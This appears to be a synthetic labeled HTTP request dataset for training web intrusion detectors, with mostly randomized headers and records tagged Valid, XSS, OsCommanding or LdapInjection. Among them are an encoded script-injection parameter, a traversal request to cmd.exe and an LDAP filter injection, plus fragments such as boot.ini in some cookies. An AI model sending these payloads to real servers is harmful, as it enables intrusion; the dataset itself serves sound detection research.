UA-Pixels: 364x686
Via: G4ts/5.7 www.tn9g.css, FTP/5.3 66.8.19.6
Transfer-Encoding: gzip
Upgrade: dtoa/8.6, tysts/7.5, rrg/6.2, sDwb/3.9
Warning: 838 www.n5ehoh.gif "seHel17adN" "Wed, 27 Jun 07 09:56:12 UTC"
X-Forwarded-For: 45.41.138.217
X-Serial-Number: 561642112
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18265
Start - Id: 47064
class: XSS
GET /bCKr@9.GC/rthoo/j3t3jSoGd0D91p9/esrk7e.msf?a4=annlli7upRbeii&niebwhd=2395056737&deu4oapV2xo=%5B%5CxC0%5D%5B%5CxBC%5Dscript++%3E%5Balert+++%28%27ifs%27%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript+%3E&Elraimnlm=1&lihye0gnej=%29+&hvsone=sss1ottd&yh6aZm=2a%40vnuaSFc HTTP/1.0
Host: www.matmtgrRi.cz
Connection: clor
Accept: application/rtf;q=0.0
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.5
Accept-Language: tj7u0si-Cmelw;q=0.6
Cache-Control: max-age=11
Client-ip: 127.63.46.215
Cookie: nfnsA=wgetfrommochav;0firetiionta= uelhy 8 ypBr;ienR=lorehioe1e
Cookie2: $Version="08"
Date: Sun, 06 May 07 05:46:04 CET
ETag: W/"kR45JZ_ktO5@vv_3fZ"
Expect: 100-continue
From: upMalngr@beooie.cz
If-Modified-Since: Mon, 21 Apr 08 01:37:56 GMT
If-Unmodified-Since: Mon, 18 Jan 10 24:41:25 UTC
If-Match: *
If-None-Match: "0XAYx1qjO7L1yBADR-v"
If-Range: "@7zCEbRjjE36qvoYnh"
Max-Forwards: 744
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest nonce
Range: 53-8432
Referer: http://nuVe.gov/axeetd2.zip
TE: trailers,gzip;q=0.4,deflate;q=0.1
Trailer: Cache-Control
User-Agent: u2oEes/7.2.0.2.2
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 987x1282
Via: 6.8 www.yxar.jpeg, 7.7 123.64.215.33
Transfer-Encoding: identity
Upgrade: 1yiN/0.8, rtga/9.0
Warning: 889 109.167.98.103 "ceSomrehteyFeh" "Sat, 20 Jan 07 24:44:38 UTC"
X-Forwarded-For: 59.196.39.49
X-Serial-Number: 9140776636485
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 47064
Start - Id: 27413
class: Valid
GET /mf/4saeKt/hsUzrdtiMt6fmA1/huuanie6iboe/qn1uItM5W7FdvRAreqc3/X1Uj.IgnBflvgI/ex9lgdBFi/ire9aunhnl/rtgeactoween5O/8NQHi6.gv1YukRB/n4AGbuR1/tGerrotrh.aspx?soh=s+iro&aEsU5gl=%3Fr&rrxyptat=jevpXC- HTTP/1.0
Host: 38.52.176.97
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.4
Accept-Language: esh-klmdmgr, zc7ue8-saI;q=0.2, esketr-ithnte4b
Cache-Control: no-cache
Client-ip: 63.50.146.180
Cookie: eoes1zuN1mnr=tNal;ecOe8tzAwoa=fkGmQPTM53W2;usoroeNeragcb=er ;FPsystem3fsSallyHNf=kmooeyc;sUehDi3omia=En:ae>aidp=fa2dropftpgsfyboot.ini
Cookie2: $Version="704"
Date: Sun, 03 Dec 06 22:25:55 UTC
ETag: "90lNt1MOgJNu@cgl.25"
Expect: 100-continue
From: s3show@itrbi0a.de
If-Modified-Since: Thu, 15 Jan 04 01:41:59 UTC
If-Unmodified-Since: Thu, 31 Jan 08 03:04:46 CET
If-Match: "LYd8z4pCwP-@fah"
If-None-Match: *
If-Range: Tue, 13 Apr 10 21:50:29 CET
Max-Forwards: 419
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest username="nseyiKua"
Authorization: Digest username="pxae"
Range: 72281-,-99334,2815-
Referer: /Nlmo0/mTgPqwe/usm4ss/nOLul.mspx
TE: deflate;q=0.3,trailers
Trailer: Host
User-Agent: Mozilla/8.2 (X11; U; Linux i586 5.3; sh-Cl; rv:5.0.0) Gecko/65210059
UA-CPU: MIPS
UA-Disp: 7900,686,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 759x1141
Via: HTTP/7.1 134.164.218.32
Transfer-Encoding: mCici
Upgrade: anhok/6.7, tgihE/5.8
Warning: 042 127.96.173.181 "nHr5eer8soa9adtcmmH" 
X-Forwarded-For: 39.176.137.22
X-Serial-Number: 012150343166763006
----: ----------------
~~~~~: ~~~~~~~~~~

null

End - Id: 27413
Start - Id: 21809
class: Valid
GET /child3include7Yhxml/2ntuidsugt3eti/kesMddls/SF3oc9outmniisiefen5/00FZcmdVT5@Lzq/JbyquumAt/v.8/a44sruTj6s/n5RbS72Q78e@pb/rOm2WW/eYCiGTlOmrm87-cN/mlDlEz.htm?Dynyts=enn&7cc=psvbscript&etegrumi=5&T@4mGx=autoexece&ydtntAltaatngs=ihttp+cmdl%27niadminl%7Eehtpassirr&rZ=esehuee4tethntnh8&afwlnybew=5257&deasetiTs7dmrC=lA9rLt%3Fw+gsm%7Ejrcpw&Uzrtl8YA=13&xtermM0EjThe=omrorGfApQU&taedr=hn3c1es7n&nsaaS=iyraiii HTTP/1.1
Host: www.grkf9eeuw.be
Connection: close
Accept: */*;q=0.1
Accept-Charset: euc-tw, iso-8859-15, windows-1254;q=0.2, x-mac-cyrillic, iso-8859-8-i
Accept-Encoding: *;q=0.2
Accept-Language: liwc-urc;q=0.9
Cache-Control: no-transform
Client-ip: 196.172.163.174
Cookie: dl=aIm_fG8ta
Cookie2: $Version="412"
Date: Tue, 07 Nov 06 09:48:54 CET
ETag: W/"h2ZOQ8GkeMdfl7Omwh"
Expect: e9ns
From: qn7fi@stAorh.org
If-Modified-Since: Thu, 29 Jan 04 10:40:32 UTC
If-Unmodified-Since: Thu, 29 Oct 09 23:56:51 CET
If-Match: "G8GhglZlq395IVA7M"
If-None-Match: *
If-Range: "gk4wh8fcxwRRJU6RCO3a"
Max-Forwards: 4
MIME-Version: 6.6
Pragma: oflceuLr=af1c
Proxy-Authorization: NTLM cXJlYXNDbkE2enhlbW40aHI0emdld2hlb296aWU3bm4=
Authorization: 1hea0s HicCssn=rire
Range: 836-,-46
Referer: /n8Lu/asaen2an/4nti/lei7/qajbeor.dll
TE: chunked
Trailer: From
User-Agent: Mozilla/4.0 (compatible; Konqueror/4.5; Mac OS X; omona; u6etrh)
UA-CPU: StrongARM
UA-Disp: 488,0035,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 5280x218
Via: 0.8 11.126.27.101
Transfer-Encoding: identity
Upgrade: eAsu/5.0, gdb/6.1
Warning: 647 130.107.153.88 "ttd15noaiStnr" "Sun, 23 Aug 09 08:59:47 GMT"
X-Forwarded-For: 32.5.142.115
X-Serial-Number: 8436166703567420278
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21809
Start - Id: 19242
class: Valid
GET /u1kRj.qlckX/s-pWC/q1hthFxnw5zDZ.s/n3y52Tj.E--C/xP/tvb/0uQMB4nnsS38vPMEYrd.css?_95iframez6YA=98345&Wh0dzpFugI=iTdunsyhaZfeni30s&nreeoepte0=0015126&eeS0lnpdsoebto=6010369&tsythrnaa=psbu5asltraodiohy&srealnh=224148&eluhhu=i0r&eibersulprpiu7=rcp&Hphpko2xmlrEuww=8109982980&QONtelnet4XpositionKBLhtaccesM=Ie%24e&hecY=16217741 HTTP/1.1
Host: www.eeilz.it:80
Connection: tydnS
Accept: text/html;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: compress;q=0.6, compress, deflate;q=0.7, gzip, identity
Accept-Language: *
Cache-Control: no-transform
Client-ip: 127.195.164.61
Cookie: 3scriptuMsZform9Xw=6scripttdn;aegeiejrfgt=tipsdEjt5Ela;swmfEvtto=1324854352;syenlhosnh=s5noisehdO;or0tresm=eliOl:nnhrdrselect\err&c;0zoe7lvtliet=r7LwtNoFD
Cookie2: $Version="4"
Date: Wed, 18 Feb 09 01:06:22 UTC
ETag: "I75X-JoVCA4.i6ES5nZ"
Expect: 100-continue
From: hyoesw@4oneiessit.it
If-Modified-Since: Thu, 16 Jul 09 11:00:56 GMT
If-Unmodified-Since: Sun, 06 Nov 05 02:00:03 CET
If-Match: *
If-None-Match: "lW8N2yHuj9DIz0D@Q0pw"
If-Range: "JZ4bg_c85dlV0F26cfG"
Max-Forwards: 4249
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Basic cG5ucnlsOmV3ZXNlY2Fp
Authorization: NTLM MXFhZXNlYWllclBnYlNyMW90Qmg2ZWVib2p0MHVPcm5odw==
Range: 775-30401,2-
Referer: http://www.a9dpn.biz/sanirni6/0afEe.pl
TE: chunked,gzip;q=0.7,gzip
Trailer: Proxy-Authorization
User-Agent: ioga (gp.Dy6fj; 3ByAa8ad5d; a_Wq7-rO; u1552j@y5Y)
UA-CPU: x86
UA-Disp: 273,4092,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7913x3682
Via: FTP/0.9 www.seriz0na.jpeg, 9.6 www.mf1tiu.tiff:29444, FTP/0.7 www.snfde.html
Transfer-Encoding: deflate
Upgrade: 9anlRu/7.8
Warning: 682 www.eteOr.htm:12055 "riL0eteotcebei" "Fri, 01 May 09 21:16:57 UTC"
X-Forwarded-For: 144.205.1.122
X-Serial-Number: 344513341459815545
----: ------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 19242
Start - Id: 28610
class: Valid
GET /cc.jpeg?wn=++y&fsowwhir3we=48 HTTP/1.0
Host: www.nhWiCidh.cz
Connection: keep-alive
Accept: text/*, text/*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ret-itgimjr;q=0.6, cl1ee5no-7on;q=0.4, seoe-Rexeile;q=0.1, sB-yevewvs;q=0.1, unosftm-n4eMen
Cache-Control: tctwdo=lds
Client-ip: 238.73.19.115
Cookie: e7eqoayddEt=8mjdrcp0a@e;ao=053;uonfttn=79;2srI2hisi=5395839090;q0WOOfAOl19.=588
Cookie2: $Version="47"
Date: Tue, 21 Dec 04 11:46:36 CET
ETag: ".W7n3UVg9XM_tMydIr"
Expect: o9iRim
From: i3ltd@nsmTrto.cz
If-Modified-Since: Mon, 01 Feb 10 21:28:01 GMT
If-Unmodified-Since: Wed, 20 Jan 10 24:01:54 UTC
If-Match: "B44sQc4HiPuLC1I96O"
If-None-Match: "m61RLYWl1izK4_eVXf7"
If-Range: Tue, 07 Mar 06 06:57:03 GMT
Max-Forwards: 15
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Digest opaque="nteit8ao"
Authorization: Basic aThoZnFvc0s6MmF0ZWV1
Range: 4-8144
Referer: http://gtot.com/5mhmte/laiR/tqa6/iame1rl.mpg
TE: trailers
Trailer: Accept
User-Agent: Mozilla/7.1 (Windows; U; Windows NT 9.7; se-n6; rv:3.5.3) Gecko/44988820
UA-CPU: 68000
UA-Disp: 8045,183,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 379x210
Via: FTP/7.6 www.t7Lu.css:11
Transfer-Encoding: compress
Upgrade: Wtis/2.1, nat7E3/0.0, faaei/4.9, oas/2.1, fFtihs/4.5
Warning: 313 www.acau.html "bckduh" "Wed, 09 Sep 09 19:22:50 CET"
X-Forwarded-For: 250.195.95.132
X-Serial-Number: 408007712667220
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 28610
Start - Id: 16708
class: Valid
GET /afZWZfpV/1mRbep/zgcY-wN/ctre5rs/ngbC/ghtpass6A0e0RDVO@Yn/k6vbscriptidvshutdown8/VtQ/zsppH9dUshutdown/iYQtLDJSePTVd0/aah1dun/HE.pl?poR2=m%5Ce%2Byo6htpz%2Bo6I&anNcAepiousa=5071569&igE7d=b8b95hef&kpahoapzoem4e5t=tnedtdnerAmayh&Tehs4imnuapspQA=yv48ZSZy&e8ca=69819&eFiitre=hN.94dN5&nwT8ae7ealftHhn=84740371&nbrro0ndaEri=3537&ntd4lnImN=e&n7fYTinnopd=u%404Y2S3YS_g_ HTTP/1.1
Host: www.Lawo.de:80
Connection: yuda
Accept: */*
Accept-Charset: euc-cn, cp-936;q=0.2, isiri-3342;q=0.0, windows-1258, iso-8859-3;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=55014
Client-ip: 25.65.22.29
Cookie: f98_S5ihFPW=01;oInkt06=9879179;i1grLAdo21_V=haehlrrrSw;hasms0weim=4593195
Cookie2: $Version="706"
Date: Mon, 01 Aug 05 17:01:12 UTC
ETag: "lU3lW.mlpvrUFxzvnDj"
Expect: euhrei6
From: o6botttt@Meerth.org
If-Modified-Since: Sun, 11 Jun 06 19:16:50 CET
If-Unmodified-Since: Fri, 24 Aug 07 20:02:41 GMT
If-Match: "e86taz2DIWAa40XI@n-G"
If-None-Match: *
If-Range: Thu, 20 Dec 07 05:57:27 UTC
Max-Forwards: 923
MIME-Version: 2.5
Pragma: eeAaa=mMla7kS
Proxy-Authorization: Basic cm50emlpbjo3aWluaTh0Zg==
Authorization: NTLM Zm90dThxb29jbnRsNGR4ZWFjYXJueW40ZW5Pcm9kcW1m
Range: 735-128151,-280736
Referer: http://www.enkeofS.st/3Eoipoo/nS5et/1Mhm4ad.gz
TE: trailers,gzip
Trailer: If-None-Match
User-Agent: Mozilla/1.7 (X11; U; Linux i586 6.3; Tl-oh; rv:3.2.7) Gecko/63092855
UA-CPU: x86
UA-Disp: 7604,2520,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 2598x289
Via: FTP/9.4 161.134.167.156:43285, 8.7 www.1fon.shtml, HTTP/0.0 www.inACso.tiff
Transfer-Encoding: compress
Upgrade: vdst/7.3, sau/9.6, h0eeg/7.5
Warning: 930 96.102.226.255 "rmts" 
X-Forwarded-For: 36.167.185.207
X-Serial-Number: 88173
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16708
Start - Id: 16195
class: Valid
GET /2Mnode0cP/6GOdRdO3OAjG/a@0.js?iqp3bcxoadB=SerisvLlgaemy&Srpaehthb9i=qa HTTP/1.1
Host: 158.52.110.188:3125
Connection: keep-alive
Accept: audio/*;q=0.0, application/*;q=0.1, video/quicktime
Accept-Charset: windows-1258
Accept-Encoding: *;q=0.7
Accept-Language: w-uiN, sae-traexs, hr-aej
Cache-Control: no-store
Client-ip: 92.83.16.136
Cookie: syohn3Oece=oysetdmbeti72r3;8htre4eidto=h0xe
Cookie2: $Version="66"
Date: Mon, 05 Apr 04 04:34:49 GMT
ETag: "0M_D8dw0p67LHW7op"
Expect: ttov=si6g
From: oltae@ieknifNr4.org
If-Modified-Since: Sat, 08 Jan 05 14:26:55 GMT
If-Unmodified-Since: Wed, 17 Feb 10 14:02:51 GMT
If-Match: *
If-None-Match: "q5dCwxc5vDZ0ao@"
If-Range: Sun, 09 Apr 06 08:38:12 UTC
Max-Forwards: 80
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Basic ZmVsenphaWE6M3dydDJx
Authorization: NTLM VWNnNGVjeXJjdE1zUmFXNnQybW9PYW5hcnJ0MGEwY2FvbnRhb3dpZXRjRGFzczZh
Range: 635922-
Referer: /Lstt/Eerwy/mqnealh/tsAin.jpg
TE: gzip;q=0.4
Trailer: Max-Forwards
User-Agent: d7hdm6ean (sNBE9n; sll4r2; nh@W-w6Tgq; iXGCE0; s7ogdAm0M)
UA-CPU: PowerPC
UA-Disp: 121,346,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 846x8936
Via: 3.7 www.p4ax.png
Transfer-Encoding: frrkht; ansua=ito6a
Upgrade: rwde/3.6, attru/5.7
Warning: 562 www.72rhlemd.png "OanfqmoOtceaolig" 
X-Forwarded-For: 113.16.19.192
X-Serial-Number: 81431781
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16195
Start - Id: 44393
class: OsCommanding
GET ..%%35c../winnt/system32/cmd.exe? HTTP/1.1
Host: www.os3y8do8.cz
Connection: ndnje
Accept: audio/x-wav
Accept-Charset: iso-8859-1;q=0.5, hz-gb-2312;q=0.8
Accept-Encoding: 
Accept-Language: Redoh-snl9e;q=0.5
Cache-Control: no-cache
Client-ip: 11.102.57.129
Cookie: r4eessnsr=oeuhsiTs;esboageojd=038928
Cookie2: $Version="56"
Date: Sat, 27 Feb 10 17:29:32 GMT
ETag: W/"JeOMB8IEzQqMZ5UXUF"
Expect: 100-continue
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Wed, 13 Jul 05 13:25:09 CET
If-Unmodified-Since: Fri, 01 Oct 04 06:39:07 UTC
If-Match: "J_F20Gx8wihcFgPQ"
If-None-Match: *
If-Range: Thu, 23 Oct 08 17:38:20 GMT
Max-Forwards: 9
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: omh4 yAzTEa=ty8o
Authorization: NTLM bGVyYXNpZWVhdXRvZGFsUmU2aW5zN29VdE5vb2VvZXNSZXl0YXlhcw==
Range: 3952-044,25518-
Referer: http://www.nmaExrn.be/rooep9.exe
TE: chunked;q=0.4
Trailer: Proxy-Authorization
User-Agent: ttYegt (lz332AB; ySw@A@_; eZpod_1; m_PSUgow@)
UA-CPU: Sparc
UA-Disp: 9663,2173,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 8335x3340
Via: rspmf/0.1 www.omfma.png:74630, HTTP/2.8 3.126.114.224, 0.9 4.202.149.5
Transfer-Encoding: identity
Upgrade: asneah/1.8, akhg/1.6
Warning: 345 www.zdydE.js:508 "oogntaebhaEnWh" "Sat, 14 Oct 06 08:34:42 GMT"
X-Forwarded-For: 223.134.122.135
X-Serial-Number: 16212196997401300
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44393
Start - Id: 32529
class: Valid
GET /eHurYYtDyDGYA8E0X_/du/QrvbscriptvthjacceptcataXXJY2/dwJomBMj2Z57Tzl/kb/tl23ZMOJzvym5Jbnv54/rHu6pelogO0aJ.php?aTprrntaa=72006735&otee=1314257978&mhyondztjlsCi2a=e%40&l8sjmeblbbaisti=ihr7&wniraA=1&CH=a+rt&seeuail=3+uMemn%3Axmlng+ldoet++b HTTP/1.1
Host: 8.237.133.128
Connection: close
Accept: audio/x-wav
Accept-Charset: *
Accept-Encoding: 
Accept-Language: h-euhnn, zpvicU-alahs;q=0.8, yo-tsntwjt
Cache-Control: no-transform
Client-ip: 30.140.74.179
Cookie: y3gDte=si2u8It;lJse1jkernT=o6lKyl;hqo=ta v;ooehad6tsTtr=atpL4sNg.TY;E8f3DzBfZyS=zs>o
Cookie2: $Version="7"
Date: Sat, 20 Nov 04 13:57:13 UTC
ETag: "LfNuYLG2OwPS_a@hHk"
Expect: ghst47t
From: so2rd@tls7s.biz
If-Modified-Since: Sat, 20 Oct 07 17:20:59 GMT
If-Unmodified-Since: Tue, 07 Apr 09 24:44:39 GMT
If-Match: "Jv@Gm5LkixIhmE5"
If-None-Match: *
If-Range: Sun, 23 Dec 07 09:02:18 CET
Max-Forwards: 4081
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ni59"
Authorization: NTLM bnByZGFodHBvdDJ3Y2U0ZWlyb2hteWE2bHNydG9HYnR0ZW1pbUlwZWV0dGh2cw==
Range: 49335-07309,-330564
Referer: /rlor/ashrebar/esrnunu/9eri/smYkteta.wmn
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/4.1 (compatible; ititiuhR; Windows NT; tta0tz0aih)
UA-CPU: PowerPC
UA-Disp: 7495,590,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5706x229
Via: 9.2 www.lyeh.html, 9.9 124.29.215.189:6258
Transfer-Encoding: identity
Upgrade: ajrIgd/6.3, orleV/5.0
Warning: 566 156.56.89.148 "sut8h0hceiiu" 
X-Forwarded-For: 10.109.104.13
X-Serial-Number: 2741094376928409
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32529
Start - Id: 9658
class: Valid
GET /iExee8hceu5Eh5/pseuDS8QyiNJT4D/ea_z_M0nNHKz@zMd/gAUEBnwtZy4childQu/e1_ANHSQe7lr7xN1gdZ/9ro2pttM0Xlw/cBUSibtIO2tn8KYrqRD./i2WR56@dk/v7r/6FQ.yV.pl?cuuAtliwta=2iti0aeoexecir&1EHuoi-telnetB_G=2e+1e+esrr+%3E&eheumivq=ioepe&yv6estoa98Qr=includebnth&object4A6ornZ8stdinU=aiifytAstp&asti=8cnwBLC.iF1&e9sTunni=0636&t5Ieer1erthknn=pt0s6&tAttt=fxtcqWZA&miNxeuk=hm9Bt6yp.pF.&e2aiaat5otE=81&akL9Mafn=4wSBq-fM&3F3FApassthru.IwWz=139643 HTTP/1.1
Host: 180.78.205.77:80
Connection: galpta
Accept: video/*;q=0.5
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.9
Cache-Control: max-stale
Client-ip: 22.60.12.210
Cookie: phpttbeie=6-7pwSM6cu0C;teDnnaau=tqer5nevalnhwn9k;t9p2etlceree2ni=rVgRP;enlips8dt4rolo=o>boot.initmpU;exboeOtawes=g;sef=30131
Cookie2: $Version="2"
Date: Mon, 03 Jul 06 06:22:56 UTC
ETag: W/"mAp4wCl6gRr7GF74grcD"
Expect: 100-continue
From: ar6lncde@ohw9srxe.uk
If-Modified-Since: Fri, 18 Aug 06 24:19:27 GMT
If-Unmodified-Since: Sat, 17 Feb 07 19:37:36 UTC
If-Match: "uwZk9PfU3V7r5xtmD"
If-None-Match: *
If-Range: Sat, 07 Aug 04 01:56:34 UTC
Max-Forwards: 01
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: ni3esO o9oc=rheoabn
Authorization: Basic d3RudDpydTNjZTU=
Range: 54-7853,-953,87-
Referer: /eenn/s2ruB/s2r9Ofjn.css
TE: gzip;q=0.8,trailers
Trailer: Via
User-Agent: Mozilla/3.2 (Machintosh; U; Mac OS X 1.0; ds-so; rv:1.9.1) Gecko/61742899
UA-CPU: StrongARM
UA-Disp: 0833,784,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 7210x634
Via: FTP/5.7 203.145.236.94, 9.7 www.xgakr.jpg
Transfer-Encoding: deflate
Upgrade: sLskE/9.9, lm6o/6.1, toe1rq/3.0
Warning: 821 www.f4tipnoj.jpeg:21799 "pyfo4" 
X-Forwarded-For: 48.192.127.27
X-Serial-Number: 048488269920
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9658
Start - Id: 31932
class: Valid
GET /6UtdrQ4DpJ/zsnttr/ep1DUmfHsf/k4/zenuaaobOVnMi8t/iHDEKadgasXp4Gh.cgi?wnseieR8ksdelee=cHZ&s7=knbht8jq1szib&lfc1ecloyTnet7h=52065763&Ao1rho=hedbH&tiefakt=annrms5Loem&lndca=echildteroeetcau0du&s8oUND=pEtee&Wvworp2YftpI=losaGc HTTP/1.0
Host: 109.91.201.149:6021
Connection: htetnru
Accept: */*;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: gzip;q=0.7, deflate;q=0.2
Accept-Language: *
Cache-Control: no-cache
Client-ip: 0.228.156.211
Cookie: eOeemh6iasj9lA=iq-61F
Cookie2: $Version="2"
Date: Sun, 21 May 06 08:34:54 UTC
ETag: W/"AVyl2g5K-1avrul9r"
Expect: rseO6aia=rtoc;snndhheg=satai
From: to1tnnt@haeslhaccn.uk
If-Modified-Since: Mon, 27 Nov 06 09:17:46 GMT
If-Unmodified-Since: Sun, 25 Jan 04 07:18:28 GMT
If-Match: "muXwmtOT_il34iz"
If-None-Match: "L1SB1asdVb40m5JnH"
If-Range: "ZEjMGInXOsYPZ_dj"
Max-Forwards: 1119
MIME-Version: 2.3
Pragma: o='bw'
Proxy-Authorization: Digest username="nesor"
Authorization: NTLM aWVvaG1pZkFvRWNhZm9PbE5tU3Rsbm9sb294dHNjbjI=
Range: -8,3314-2228
Referer: /oiiH/taqdh.tiff
TE: trailers
Trailer: Expect
User-Agent: Mozilla/3.6 (X11; U; SunOS sun4u 3.9; an-si; rv:9.7.4) Gecko/94831538
UA-CPU: 68000
UA-Disp: 0617,6315,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 576x144
Via: 4.9 www.hilbe.shtml
Transfer-Encoding: iftety
Upgrade: nKety0/5.6, wZTeeb/7.6
Warning: 131 www.apir.html "lnAgieyr2dmtfnwy" 
X-Forwarded-For: 159.180.214.45
X-Serial-Number: 50617070413
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31932
Start - Id: 38105
class: LdapInjection
GET /teVTsrqd/uUIAF/ub7q4J/qdrblsetrsoptoudrnk/t6tks4gRN-0x0Cr/uiakblOatyuhtIet/l60hPUp16.CMgE.htm?f7oO=415341&nwspf6laa=%29+%28+%7C++%28displayName%3Dhad*%29++%28name+%3Dhad*++++%29%28+mail%3Dhad*%29&enrn5d2c=33606 HTTP/1.1
Host: www.8rsTtue.be
Connection: close
Accept: application/zip;q=0.3, application/*
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: be='ehaec'
Client-ip: 223.239.75.68
Cookie: aa8a=od;.sRIf@6v=21923;aure3toh9otu=eiuimgs;yteeT=roV;eyIionon=nx864w$&t7wnahmw(l
Cookie2: $Version="3"
Date: Mon, 04 Sep 06 19:19:16 UTC
ETag: "Zj4yOJLgWxL5jkoqj"
Expect: yzytf=wi36hMoe
From: ehldyeiL@ertsuha.st
If-Modified-Since: Thu, 09 Jul 09 07:04:49 GMT
If-Unmodified-Since: Sat, 06 Nov 04 13:37:48 GMT
If-Match: "-do@nSPAOBoysd0"
If-None-Match: "t.1qt@0u4ckgzYDlC@uK"
If-Range: Mon, 20 Jun 05 12:46:55 UTC
Max-Forwards: 013
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: ntddnv dr9t=oezhv
Authorization: Digest response="611D89e5d2CEa6Fc2EC3E6B420C42D6a"
Range: -26705,8389-9530,6-32
Referer: http://www.b3ayf.be/xnaeneB/irat66R.rar
TE: chunked,deflate;q=0.7,trailers
Trailer: Trailer
User-Agent: zf9aae (hdqecsMVv; e-2AVVO1X; vt5Xgz4Y; loy667; tZbDC2MkS)
UA-CPU: StrongARM
UA-Disp: 072,9161,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3700x2595
Via: HTTP/3.2 149.27.137.253
Transfer-Encoding: deflate
Upgrade: ifowud/4.0, tto/4.9, xoi/9.2, yMow/1.8, ttyat/1.1
Warning: 144 20.10.204.100 "scbn8telndd3" "Sun, 20 Feb 05 17:46:24 UTC"
X-Forwarded-For: 174.234.21.215
X-Serial-Number: 2885123328233620
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38105
Start - Id: 23798
class: Valid
GET /etaaaota/taoM7d12Oj/ijn/snotgrols0/dLenWbW5/dM8J_J9z6/v-XMjIwBM81UBd/ndE6UTCkcJBiLtQD1sY/nyPe8jPR6/szDGA1EpxRYo1BGWHzxX.html? HTTP/1.0
Host: www.inaEue.com
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8-i, windows-874, iso-2022-kr;q=0.6, windows-1255;q=0.0
Accept-Encoding: *;q=0.8
Accept-Language: sgrnmIl-dEa;q=0.4, uoanec6p-anu51eo2, acj0ee-le
Cache-Control: max-stale=182
Client-ip: 18.204.47.206
Cookie: wmueoBosn=71726084;w9cnr=pXQIqF2F9m;tl0noi=tai0yYfeesentNrT;joThnresh=lxII
Cookie2: $Version="4"
Date: Sat, 05 Mar 05 19:21:51 CET
ETag: W/".KozA1JWUQDErC3-cLUn"
Expect: 100-continue
From: xe7vcre@gune.org
If-Modified-Since: Sun, 29 May 05 13:49:40 UTC
If-Unmodified-Since: Sun, 16 May 04 24:43:09 GMT
If-Match: *
If-None-Match: "OM59uqcagSKxjgwli"
If-Range: Mon, 08 May 06 24:57:21 CET
Max-Forwards: 01
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: NTLM ckRTdG5mZXJvVXNvc2VvZ0cydGV4TG95MXJ4cmYyb2Zib25jaWNrZWV5YXJpMA==
Authorization: ezgf fhionov=aane
Range: 323-
Referer: http://ncetwrg.cz/Urdahr/siaporbN/netyn.txt
TE: chunked;q=0.9
Trailer: If-Modified-Since
User-Agent: Mozilla/1.8 (compatible; MSIE 3.7; Unix; ueftutth7; ympettb)
UA-CPU: MIPS
UA-Disp: 7512,9255,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 884x6494
Via: 0.6 149.236.70.234, FTP/6.5 www.8toedine.js
Transfer-Encoding: compress
Upgrade: e1rns/1.5, 4Ailn/4.5
Warning: 765 www.oiit7.html:14 "goersPi" 
X-Forwarded-For: 151.135.237.72
X-Serial-Number: 28931730
----: -----------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 23798
Start - Id: 12571
class: Valid
